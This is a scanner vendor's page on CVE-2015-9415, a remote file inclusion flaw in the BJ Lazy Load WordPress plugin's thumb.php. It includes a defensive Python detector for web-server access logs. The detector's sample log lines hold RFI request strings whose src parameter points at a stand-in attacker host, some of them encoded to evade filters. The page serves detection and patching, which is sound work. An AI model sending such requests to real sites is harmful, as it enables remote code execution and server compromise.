S4E

CVE-2015-9415 Scanner

CVE-2015-9415 Scanner - Remote File Inclusion (RFI) vulnerability in BJ Lazy Load

Short Info

Level: High
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 3 weeks 19 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox: -

BJ Lazy Load is a popular plugin for WordPress, a widely used content management system for websites. The plugin is designed to improve page load times by lazy loading images and other content, deferring their loading until they enter the viewport. This makes websites run more efficiently for end users, especially on mobile devices with slower connections. Website developers and administrators primarily use BJ Lazy Load to optimize site performance. It is frequently updated to align with the latest WordPress versions and web development best practices. BJ Lazy Load aims to improve user experience and SEO rankings by cutting down on loading times.

The vulnerability found in BJ Lazy Load is a Remote File Inclusion (RFI), which is a critical security flaw. An RFI vulnerability allows remote attackers to include files from a different server, which can then be executed in the vulnerable server's environment. The flaw found in version 0.7.5 centers on the plugin's bundled TimThumb script, which does not fully validate or sanitize its inputs. This can lead to attackers executing arbitrary code or stealing information. It poses significant security risks to websites relying on BJ Lazy Load if left unpatched.

Technical details about this vulnerability reveal that the vulnerable endpoint is the "thumb.php" script within the BJ Lazy Load plugin. This script improperly handles the "src" parameter, enabling remote file inclusion. Attackers craft a URL that points to a malicious source via this parameter, leading the server to fetch and potentially execute an unauthorized file. The vulnerability is confirmed when the server responds with specific error messages or includes external images. Proper exploitation of the vulnerable parameter can let attackers execute scripts in the WordPress environment remotely.
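The pattern described above (a request to the plugin's thumb.php whose src parameter names a host other than the site itself) is easy to look for in web-server access logs after the fact. The following is an added example written for this page, not S4E's scanner or the plugin's own code: it parses combined-format log lines, keeps only requests to thumb.php, and flags those whose src value resolves to an off-site host, decoding the value a second time so a double-encoded URL is not missed. The plugin path, the local host allowlist and the log lines are all constructed for illustration.

```python
"""Flag access-log requests to BJ Lazy Load's thumb.php whose "src"
parameter points at a remote host (the RFI pattern described above).

Added example; not S4E's scanner or the plugin's code. The plugin path,
LOCAL_HOSTS and SAMPLE_LOG are constructed for illustration.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hosts that legitimately serve this site's own images (assumed; set per site).
LOCAL_HOSTS = {"example.com", "www.example.com"}

# Apache/nginx combined log format: client, identity, user, [timestamp],
# "METHOD path PROTOCOL", status. The path group also carries the query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def src_is_remote(query):
    """Return the remote URL named by the src parameter, or None if src is
    absent, relative, or points at one of LOCAL_HOSTS."""
    params = parse_qs(query, keep_blank_values=True)  # decodes one layer of %xx
    for raw in params.get("src", []):
        candidate = unquote(raw)  # second decode catches double-encoded values
        parts = urlsplit(candidate)
        # Any netloc means an absolute or protocol-relative URL (http://, //host/...);
        # treat it as remote unless the host is one of ours.
        if parts.netloc and parts.hostname and parts.hostname.lower() not in LOCAL_HOSTS:
            return candidate
    return None


def scan_log(lines):
    """Return one finding dict per request to thumb.php with a remote src."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        url = urlsplit(m.group("path"))
        if not url.path.lower().endswith("/thumb.php"):
            continue
        remote = src_is_remote(url.query)
        if remote:
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "status": int(m.group("status")),
                "src": remote,
            })
    return findings


# Constructed sample lines: two benign thumbnail requests, one unrelated
# request, and three off-site src values (plain, double-encoded, protocol-relative).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:30 +0000] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=/wp-content/uploads/a.jpg&w=300 HTTP/1.1" 200 4096',
    '198.51.100.7 - - [10/Oct/2023:13:55:31 +0000] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://www.example.com/wp-content/uploads/b.jpg&w=300 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Oct/2023:13:55:32 +0000] "GET /index.php HTTP/1.1" 200 8192',
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http://attacker.example/x.txt&w=10 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=http%253A%252F%252Fattacker.example%252Fy.txt HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /wp-content/plugins/bj-lazy-load/thumb.php?src=%2F%2Fattacker.example%2Fz.txt HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} src={f['src']}")
```

A 200 response on a flagged line is the case worth investigating first, since it indicates the server fetched and served the remote content rather than rejecting it; the 404 line still shows someone probing the endpoint. The allowlist approach (rather than a denylist of bad hosts) mirrors the fix a maintainer would apply to the script itself: accept only local paths or the site's own hosts.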

If exploited, this RFI vulnerability can have severe consequences, ranging from unwanted code execution to full server compromise. Malicious actors could include scripts that steal user data, compromise sensitive information, or escalate their access privileges. This could degrade the website's performance and reliability, causing further damage to brand reputation and user trust. Additionally, infected sites may become vectors for further attacks on site visitors. Timely patch management is critical to minimizing these risks.
